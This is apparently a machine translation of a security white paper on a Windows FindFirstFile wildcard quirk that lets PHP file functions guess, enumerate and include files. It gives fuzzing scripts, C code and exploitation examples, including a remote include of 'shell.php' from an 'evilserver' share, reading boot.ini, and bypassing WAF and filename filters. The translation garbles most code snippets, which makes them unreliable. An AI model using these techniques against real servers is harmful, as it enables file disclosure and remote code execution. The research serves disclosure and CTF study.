Windows file system mechanism triggered by PHP path blasting problem Analysis _php example

1. Opening remarks

This disclosure is the result of the test results of the questions raised in the following Web pages:
Http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

<?php for
($i =0 $i <255; $i + +) {
$url = ' 1.ph '. chr ($i);
$tmp = @file_get_contents ($url);
if (!empty ($tmp)) echo chr ($i). "\ r \ n";
}
? >

Known 1.php exists, the results of the above script access are:

1.php
1.phP
1.ph<
1.ph>

Can get back.
The first two return results are always known (because the Windows file system supports the mechanism of the size of the interchange), and two other types of returns attract our attention.
Test PHP Version: php4.9,php5.2,php5.3,php6.0
Test system: WINXP SP3 x32,winxp SP2 x64,win7,win2k3
After testing, we conclude that the vulnerability affects all windows+php versions

2. Delve into the results of a fuzzy test

To continue to delve deeper into the information about the bug, we made some changes to the demo:

<?php for
($j =0 $i <256; $j + +) {for
($i =0; $i <256; $i + +) {
$url = ' 1.p '. chr ($j). chr ($i);
$tmp = @file_get_contents ($url);
if (!empty ($tmp)) echo chr ($j). Chr ($i). "\ r \ n";
}
? >

In debugging the PHP interpreter, we boil down this "magical" flaw to the result of a WINAPI function FindFirstFile () (http://msdn.microsoft.com/en-us/library/aa364418 V =vs.85. aspx). Better yet, when the trace function calls the stack, we find that the character ">" is replaced with "?", the character "<" is replaced with "*", and the symbol "(double quotes) is replaced with a". " Character. This was mentioned in the 2007 MSDN published documentation: http://msdn.microsoft.com/en-us/library/community/history/aa364418%28v=vs.85%29.aspx?id=3
But this bug has not been fixed by any version of Windows that has ever been released!
What we want to clarify is that the function FindFirstFile () in PHP is far from file_get_contents (). The functions available to this bug we have listed the following table:

In addition, we found that the utilization can also be used in C + +, following the example from MSDN:

#include <windows.h>
#include <tchar.h>
#include <stdio.h>
void _tmain (int argc, TCHAR *argv[])
{
win32_find_data findfiledata;
HANDLE hfind;
if (argc!= 2)
{
_tprintf (TEXT ("Usage:%s [target_file]\n"), argv[0]);
return;
}
_tprintf (TEXT ("Target file is%s\n"), argv[1]);
Hfind = FindFirstFile (argv[1], &findfiledata);
if (hfind = = Invalid_handle_value)
{
printf ("FindFirstFile failed (%d) \ n", GetLastError ());
return;
}
else
{
_tprintf (TEXT ("The" the "the" the "the" the "the" Found is%s\n "),
findfiledata.cfilename);
FindClose (hfind);
}

The Boot.ini file is successfully accessed when the argument "c:\bo<" is passed in.

3. Summary of utilization methods

When the FindFirstFile () function is invoked, "<" is replaced with "*", which means that the rule can cause "<" to replace more than one character, but it is found in the test that not everything is what we want. Therefore, in order to ensure that "<" is replaced with "*", it should be "<<"
Example:include (' shell< ');    or include (' shell<< '); When you have more than one file in a folder that starts with a shell, the execution takes the first file sorted by alphabetical form.
When the FindFirstFile () function is invoked, ">" is replaced with "?", which means that ">" can replace a single arbitrary character
Example:include (' shell.p>p '); When a file has more than one shell.p?p wildcard, the execution takes the first file sorted alphabetically.
When the FindFirstFile () function is invoked, "" "(double quotes) is replaced with". "
Example:include (' Shell ' php '); ===>include (' shell.php ');
If the first character of the filename is "." , you can ignore it when you read it.
Example:fopen ('. htacess ');   ==>fopen (' htacess '); Plus the use of ==>fopen (' h<< ') in the 1th;
The end of the file name can be combined with a series of/or \, and you can add the. character in the middle, just make sure the last one is "."
Example:fopen ("config.ini\\.//\/\/\/."); ==> fopen (' config.ini\./.\. '); ==>fopen (' config.ini/////. ')   ==>fopen (' Config.ini ... ') Translator Note: I am not very understanding of the use here, what is the role? Truncated?
The function can also call a network shared file that starts with "\", which can be time-consuming. Add that if the share name does not exist, the file operation will take an additional 4 seconds, and may trigger a time response mechanism and max_execution_time error. Fortunately, the exploit can be used to bypass Allow_url_fopen=off and eventually lead to an RFI (remote file contains)
Example:include (' \\evilserver\shell.php ');
You can also toggle the file's disk name in the following ways
Include (' \\.\c:\my\file.php\. \.. \.. \d:\anotherfile.php ');
Select the disk naming syntax to bypass slash character filtering
file_get_contents (' C:boot.ini '); ==> file_get_contents (' C:/boot.ini ');
In PHP's command-line environment (Php.exe), details on the use of system retention name files
Example:file_get_contents (' c:/tmp/con.jpg '); This will endlessly read 0 bytes from the con device until it encounters EOF
Example:file_put_contents (' C:/tmp/con.jpg ', Chr (0x07)); This will continue to make the server sound like beep

4. More in-depth use of methods

In addition to the methods already shown above, you can use the following posture to bypass WAF or file name filtering
Consider this example:

<?php
file_get_contents ("/images/". $_get[' a ']. ". JPG ");
or another function from Table 1, i.e. include ().
? >

Visit test.php?a=. /a<%00
Two kinds of results may occur

Warning:include (/images/. /a<) [function.include]: Failed to open stream:invalid argument.
Warning:include (/images/. /a<) [function.include]: failed to open stream:permission denied ...

If this is the first case, there is no file with a beginning, and the second one exists.

In addition, there are records showing that sometimes the site throws the following error:

Warning:include (/ADMIN_H1D3) [function.include]: failed to open stream:permission denied ...

This indicates that there is more than one file (folder) under the folder, and the first is admin_h1d3.

5. Conclusion
The experiment tells us that PHP itself does not have so many vulnerabilities, what we see is: too much reliance on another programming language (note: A bug in this article that is produced from WINAPI) and enforced directly will result in subtle bugs (bugs) and ultimately harm (VUL). This broadens the scope of the fuzzy test (translator note: Not only to study the web level, but to the bottom of the system), and eventually lead to ids,ips rules update. Admittedly, code needs to be protected, patches need to be upgraded and expanded. But that's not really what we want to focus on. In the moment, I think we are more cautious about writing more stringent filtering rules, as we have been doing. A long shoulder to keep improving.
Because this is a problem with the underlying application layer, we suspect that similar problems may occur in other Web applications. We also tested the MYSQL5, and the experimental results showed that MYSQL5 did not have a similar vulnerability. But we still think that a similar vulnerability would appear in an interpretive language such as Perl, Python, and Ruby.

6.Referer

PHP Application source code audits Advanced Technology:
Http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
MSDN findfirstfile Function Reference:
http://msdn.microsoft.com/en-us/library/aa364418 (v=vs.85). aspx
MSDN Comments History:
http://msdn.microsoft.com/en-us/library/community/history/aa364418 (v=vs.85). aspx ? id=3
MSDN article«naming Files, Paths, and namespaces»:
http://msdn.microsoft.com/en-us/library/aa365247 (v =vs.85). aspx
Technet article«managing Files and directories»:
http://technet.microsoft.com/en-us/library/ Cc722482.aspx
Paper«technique of quick exploitation of 2blind SQL injection»:
http://www.exploit-db.com/ papers/13696/

==================================================================
Complete the full text.
Note: The article is a white paper published at the end of 2011, and the bug is still there today. I was a few months ago to do cuit a CTF when I stumbled on the use of the bug, that is to see this article, was just a rough rough, wrote a PHP script to run the directory. There is nothing to do this time, the translation has been sorted out.